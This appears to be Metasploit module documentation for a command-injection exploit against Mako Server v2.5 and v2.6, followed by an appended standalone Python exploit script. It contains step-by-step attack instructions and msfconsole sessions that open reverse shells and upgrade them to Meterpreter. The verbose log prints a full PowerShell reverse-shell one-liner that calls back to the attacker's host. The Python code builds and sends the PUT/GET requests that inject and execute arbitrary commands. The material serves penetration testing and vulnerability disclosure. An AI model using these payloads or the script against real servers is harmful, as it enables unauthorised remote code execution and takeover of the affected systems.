## Vulnerable Application

This module exploits a vulnerability found in Mako Server v2.5 and v2.6. It is possible to inject arbitrary OS commands through the Mako Server tutorial page by sending a PUT request to save.lsp. The attacker-supplied input is saved on the victim's machine and is executed by sending a GET request to manage.lsp.

Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391

[Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications.

This module has been verified against the following Mako Server versions on Windows XP SP3, Windows 7 SP1 and Linux Ubuntu 16.04 LTS:

- v2.5
- v2.6

Links:

- [Windows x86 installer](https://makoserver.net/download/mako.windows.x86.exe)
- [Windows download page](https://makoserver.net/download/windows)
- [Linux x64 installer](https://makoserver.net/download/mako.linux-x64.tar.gz)
- [Linux download page](https://makoserver.net/download/linux-x86)
- [Documentation](https://makoserver.net/download/manual)

## Verification Steps

### Windows

1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (PowerShell must be available on the target for the payload used in this example to work)
2. After the installer finishes, double click the "Mako-Demo" shortcut on the desktop
3. Start msfconsole on the attacking host
4. Do: ```use exploit/multi/http/makoserver_cmd_exec```
5. Do: ```set RHOST [IP]```
6. Do: ```set PAYLOAD cmd/windows/reverse_powershell```
7. Do: ```set LHOST [IP]```
8. Do: ```exploit```
9. You should get a Windows command shell

### Linux

1. Extract "mako.linux-x64.tar.gz" on a Linux Ubuntu 16.04 LTS (x64) target (Python must be available on the target for the payload used in this example to work)
2. From inside the extracted folder, do ```./rundemo.sh```
3. Start msfconsole on the attacking host
4. Do: ```use exploit/multi/http/makoserver_cmd_exec```
5. Do: ```set RHOST [IP]```
6. Do: ```set PAYLOAD cmd/unix/reverse_python```
7. Do: ```set LHOST [IP]```
8. Do: ```exploit```
9. You should get a Linux command shell (you may need to wait ~30 seconds)

## Scenarios

```
msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
PAYLOAD => cmd/windows/reverse_powershell
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
LHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > exploit

[*] Started reverse TCP handler on 10.10.10.2:4444
[*] Sending payload to target...
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400

Microsoft Windows
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Smith\Downloads\MakoServer>
```

### Verbose Output

```
msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set VERBOSE true
VERBOSE => true
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
PAYLOAD => cmd/windows/reverse_powershell
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
LHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > check

[*] Trying to detect running Mako Server and necessary files...
[*] Mako Server save.lsp returns correct ouput.
[*] 10.10.10.3:80 The target appears to be vulnerable.
msf exploit(makoserver_cmd_exec) > exploit

[*] Started reverse TCP handler on 10.10.10.2:4444
[*] Sending payload to target...
[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]])
[*] Sending PUT request to save.lsp...
[*] Sending GET request to manage.lsp...
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400

Microsoft Windows
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Smith\Downloads\MakoServer>
```

### Targeting Windows 7 SP1 x64 running Mako Server v2.5

A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session:

```
msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
RHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
PAYLOAD => cmd/windows/reverse_powershell
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
LHOST => 10.10.10.4
msf exploit(makoserver_cmd_exec) > check
[*] 10.10.10.2:80 The target appears to be vulnerable.
msf exploit(makoserver_cmd_exec) > exploit

[*] Started reverse TCP handler on 10.10.10.4:4444
[*] Sending payload to target...
[*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:49189) at 2017-10-25 20:57:56 -0400

Microsoft Windows
Copyright (c) Microsoft Corporation.  All rights reserved.

C:\Users\Smith\Downloads\MakoServer>^Z
Background session 1? [y/N]  y
msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type         Information  Connection
  --  ----  ----         -----------  ----------
  1         shell cmd/windows               10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2)

msf post(shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf post(shell_to_meterpreter) > set LPORT 8080
LPORT => 8080
msf post(shell_to_meterpreter) > exploit

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.10.4:8080
[-] Powershell is not installed on the target.
[*] Command stager progress: 1.66% (1699/102108 bytes)
...
[*] Command stager progress: 100.00% (102108/102108 bytes)
[*] Post module execution completed
msf post(shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  1         shell cmd/windows                                   10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2)
  2         meterpreter x86/windows  smith-PC\smith @ SMITH-PC  10.10.10.4:8080 -> 10.10.10.2:49190 (10.10.10.2)

msf post(shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: smith-PC\smith
meterpreter > sysinfo
Computer        : SMITH-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
```

### Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5

A typical scenario would be to obtain a Linux command shell and then upgrade to a Meterpreter session:

```
msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
RHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
LHOST => 10.10.10.4
msf exploit(makoserver_cmd_exec) > check
[*] 10.10.10.2:80 The target appears to be vulnerable.
msf exploit(makoserver_cmd_exec) > exploit

[*] Started reverse TCP handler on 10.10.10.4:4444
[*] Sending payload to target...
[*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57888) at 2017-11-10 15:52:33 -0500

ls
LICENSE.txt
mako
mako.zip
README.txt
rundemo.sh
tutorial
^Z
Background session 1? [y/N]  y
msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)

msf post(shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf post(shell_to_meterpreter) > set LPORT 8080
LPORT => 8080
msf post(shell_to_meterpreter) > exploit

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.10.4:8080
[*] Sending stage (847604 bytes) to 10.10.10.2
[*] Meterpreter session 2 opened (10.10.10.4:8080 -> 10.10.10.2:60448) at 2017-11-10 15:54:38 -0500
[*] Command stager progress: 100.00% (736/736 bytes)
[*] Post module execution completed
msf post(shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                        Connection
  --  ----  ----                   -----------                                        ----------
  1         shell cmd/unix                                                            10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
  2         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ 10.10.10.2  10.10.10.4:8080 -> 10.10.10.2:60448 (10.10.10.2)

msf post(shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : 10.10.10.2
OS           : Ubuntu 16.04 (Linux 4.10.0-35-generic)
Architecture : x64
Meterpreter  : x86/linux
```
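The PUT/GET exchange described under Vulnerable Application, as an added Python example that is not part of the Metasploit module or of Mako Server. It builds the Lua body the way the module's verbose output shows it (`os.execute([[...]])`), chooses a Lua long-bracket level that survives a command containing `]]` (a plain `[[...]]` wrapper would be cut short by it), shows the two raw requests, and can send them with the standard library. The directory the two tutorial scripts live under is an assumption (`/examples/`, held in `DEFAULT_BASE_PATH`), since the page names only `save.lsp` and `manage.lsp`; the host, port and command in the usage are placeholders.

```python
"""Build, and optionally send, the two-request exchange against the Mako
Server tutorial: a PUT stores attacker-supplied Lua in save.lsp, then a GET
to manage.lsp executes it. Added example; not the module's own code."""
import http.client
import socket
import sys

# ASSUMPTION: the tutorial scripts are served under this directory. The page
# names only the two file names; adjust to where the target serves them.
DEFAULT_BASE_PATH = "/examples/"


def lua_long_string(text: str) -> str:
    """Return `text` as a Lua long-bracket literal: [[...]], [=[...]=], ...

    The module wraps the command in [[ ... ]], which breaks if the command
    itself contains "]]". Lua allows any number of '=' between the brackets,
    so pick the smallest level whose closing bracket first occurs exactly
    where we append it.
    """
    # Lua discards a newline that immediately follows the opening bracket,
    # so a command must not start with one.
    if text.startswith(("\n", "\r")):
        text = " " + text
    level = 0
    while True:
        close = "]" + "=" * level + "]"
        if (text + close).find(close) == len(text):
            break
        level += 1
    eq = "=" * level
    return f"[{eq}[{text}]{eq}]"


def build_injection_body(command: str) -> str:
    """The Lua that gets stored in save.lsp: a single os.execute() call."""
    return f"os.execute({lua_long_string(command)})"


def build_requests(command: str, host: str, base_path: str = DEFAULT_BASE_PATH):
    """Return the raw PUT and GET requests as they appear on the wire."""
    body = build_injection_body(command).encode()
    put = (
        f"PUT {base_path}save.lsp HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: text/plain\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    ).encode() + body
    get = f"GET {base_path}manage.lsp HTTP/1.1\r\nHost: {host}\r\n\r\n".encode()
    return put, get


def send_exchange(host: str, port: int, command: str,
                  base_path: str = DEFAULT_BASE_PATH, timeout: float = 10.0):
    """Send the PUT, then the GET; return (put_status, get_status).

    os.execute() blocks until the command exits, so the GET response only
    arrives once the command does. A command that never returns (a reverse
    shell) leaves the GET hanging; that read timeout is reported as None,
    not as a failure.
    """
    body = build_injection_body(command).encode()
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("PUT", base_path + "save.lsp", body=body,
                     headers={"Content-Type": "text/plain"})
        put_resp = conn.getresponse()
        put_resp.read()
        try:
            conn.request("GET", base_path + "manage.lsp")
            get_resp = conn.getresponse()
            get_resp.read()
            get_status = get_resp.status
        except (socket.timeout, TimeoutError):
            get_status = None
        return put_resp.status, get_status
    finally:
        conn.close()


if __name__ == "__main__":
    # Placeholder usage: python3 mako_put_get.py 10.10.10.3 80 'id' [/examples/]
    if len(sys.argv) < 4:
        sys.exit(f"usage: {sys.argv[0]} HOST PORT COMMAND [BASE_PATH]")
    host, port, cmd = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    base = sys.argv[4] if len(sys.argv) > 4 else DEFAULT_BASE_PATH
    put, get = build_requests(cmd, host, base)
    print(put.decode(), get.decode(), sep="\n\n")
    print("statuses:", send_exchange(host, port, cmd, base))
```

The bracket-level search is the part worth keeping: `lua_long_string("x]")` yields `[=[x]]=]` rather than the broken `[[x]]]`, and `lua_long_string("x]=")` correctly stays at level 0, because `]=]` would be the wrong closer there.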